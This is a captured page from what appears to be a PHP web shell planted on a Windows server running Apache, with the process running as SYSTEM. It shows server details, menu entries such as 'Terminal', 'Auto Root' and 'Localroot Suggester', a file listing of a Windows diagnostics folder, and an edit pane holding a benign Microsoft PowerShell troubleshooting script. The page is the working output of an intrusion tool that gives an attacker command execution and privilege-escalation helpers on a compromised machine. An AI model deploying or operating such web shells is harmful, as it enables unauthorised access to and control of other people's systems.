Windows NT KAMIDAKI 10.0 build 19045 (Windows 10) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.3.9
Server IP : 192.168.3.16 & Your IP : 216.73.216.52
Domains :
Cant Read [ /etc/named.conf ]
User : SISTEMA
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
Windows /
diagnostics /
scheduled /
Maintenance /
Delete
Unzip
Name
Size
Permission
Date
Action
en-US
[ DIR ]
drwxrwxrwx
2023-03-23 12:54
pt-BR
[ DIR ]
drwxrwxrwx
2019-12-07 15:53
CL_Utility.ps1
13.54
KB
-rw-rw-rw-
2019-12-07 10:09
DiagPackage.diagpkg
11.16
KB
-rw-rw-rw-
2019-12-07 10:09
DiagPackage.dll
76.5
KB
-rw-rw-rw-
2019-12-07 10:09
RS_AdminDiagnosticHistory.ps1
1.12
KB
-rw-rw-rw-
2019-12-07 10:09
RS_MachineWERQueue.ps1
1.8
KB
-rw-rw-rw-
2019-12-07 10:09
RS_SyncSystemTime.ps1
1.85
KB
-rw-rw-rw-
2019-12-07 10:09
RS_UserDiagnosticHistory.ps1
1.11
KB
-rw-rw-rw-
2019-12-07 10:09
RS_UserWERQueue.ps1
1.76
KB
-rw-rw-rw-
2019-12-07 10:09
TS_DiagnosticHistory.ps1
2.53
KB
-rw-rw-rw-
2019-12-07 10:09
TS_InaccurateSystemTime.ps1
4.4
KB
-rw-rw-rw-
2019-12-07 10:09
TS_WERQueue.ps1
2.77
KB
-rw-rw-rw-
2019-12-07 10:09
Save
Rename
# Copyright � 2008, Microsoft Corporation. All rights reserved. trap {break} # Include common library . .\CL_Utility.ps1 Import-LocalizedData -BindingVariable localizationString -FileName CL_LocalizationData # function library # Function to check whether have unnecessary files function Test-UnnecessaryFiles([string]$folder = $(throw "No folder is specified")) { if([String]::IsNullOrEmpty($folder) -or (-not(Test-Path $folder))) { return $false } [int]$threshold = -1 $folders = Get-ChildItem -literalPath $folder -Recurse -Force | Where-Object {($_.PSIsContainer) -and ((($_.CreationTime).CompareTo((Get-Date).AddMonths($threshold))) -lt 0)} return ($folders -ne $null) } # Check troubleshooting history Write-DiagProgress -Activity $localizationString.CheckTSHistory [string]$userTSHistoryPath = Get-UserTSHistoryPath [string]$adminTSHistoryPath = Get-AdminTSHistoryPath [double]$userTSHistorySize = (Get-FolderSize $userTSHistoryPath) [double]$adminTSHistorySize = (Get-FolderSize $adminTSHistoryPath) [double]$totalSize = Format-DiskSpaceMB ($userTSHistorySize + $adminTSHistorySize) # Reporting @{Name=$userTSHistoryPath;Space=$userTSHistorySize} | Select-Object -Property @{Name=$localizationString.userTSHistoryPath;Expression={$_.Name}},@{Name=$localizationString.userTSHistorySize;Expression={(Format-DiskSpaceMB $_.Space) + "MB"}} | ConvertTo-Xml | Update-DiagReport -id UserTSHistorySizeInfo -Name $localizationString.UserTSHistoryInfo_name -Description $localizationString.UserTSHistoryInfo_description -rid "RC_DiagnosticHistory" @{Name=$adminTSHistoryPath;Space=$adminTSHistorySize} | Select-Object -Property @{Name=$localizationString.adminTSHistoryPath;Expression={$_.Name}},@{Name=$localizationString.adminTSHistorySize;Expression={(Format-DiskSpaceMB $_.Space) + "MB"}} | ConvertTo-Xml | Update-DiagReport -id AdminTSHistorySizeInfo -Name $localizationString.AdminTSHistoryInfo_name -Description $localizationString.AdminTSHistoryInfo_description -rid "RC_DiagnosticHistory" if(Test-UnnecessaryFiles $userTSHistoryPath) { Update-DiagRootcause -ID "RC_DiagnosticHistory" -Detected $true -Parameter @{'UnwantedSpace'=(Format-DiskSpaceMB $totalSize)} return } if(Test-UnnecessaryFiles $adminTSHistoryPath) { Update-DiagRootcause -ID "RC_DiagnosticHistory" -Detected $true -Parameter @{'UnwantedSpace'=(Format-DiskSpaceMB $totalSize)} return } Update-DiagRootcause -ID "RC_DiagnosticHistory" -Detected $false -Parameter @{'UnwantedSpace'=(Format-DiskSpaceMB $totalSize)}